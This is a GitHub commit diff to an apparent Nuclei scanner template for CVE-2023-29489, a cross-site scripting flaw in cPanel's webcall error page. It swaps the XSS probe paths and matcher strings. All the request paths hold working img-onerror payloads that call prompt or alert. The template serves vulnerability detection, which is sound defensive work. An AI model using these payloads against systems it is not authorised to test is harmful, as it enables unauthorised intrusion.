updated req and matcher

patch-1
Ritik Chaddha 2024-04-13 15:14:27 +05:30 committed by GitHub
parent c78061a124
commit 9062ceb8a8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 6 deletions

View File

@ -1,8 +1,8 @@
id: CVE-2023-29489
info:
name: cPanel - Cross-Site Scripting
author: DhiyaneshDk, 0xKayala
name: cPanel < 11.109.9999.116 - Cross-Site Scripting
author: DhiyaneshDk,0xKayala
severity: medium
description: |
An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
@ -36,17 +36,15 @@ http:
- method: GET
path:
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
- '{{BaseURL}}/cpanelwebcall/<><img%20src=1%20onerror=alert("XSS-POC-by-0xKayala")>'
- '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
- '<img src=x onerror="prompt(1)">aaaaaaaaaaaa'
- '<><img src=1 onerror=alert("XSS-POC-by-0xKayala")>'
- 'Invalid webcall ID:'
condition: and